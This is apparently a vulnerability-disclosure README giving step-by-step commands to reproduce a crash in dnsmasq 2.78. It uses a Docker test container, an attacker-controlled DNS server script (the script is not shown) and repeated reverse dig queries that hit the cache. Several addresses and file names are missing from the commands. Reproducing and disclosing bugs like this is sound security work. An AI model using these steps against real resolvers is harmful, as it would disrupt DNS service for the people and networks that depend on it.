Skip to content
Switch branches/tags
Go to file
Cannot retrieve contributors at this time
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp dnsmasq_test:/
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal let’s launch attacker controlled DNS server:
# python 53
Listening at
3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver
dnsmasq: cleared cache
4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x > /dev/null
# dig @localhost -p 53535 -x > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.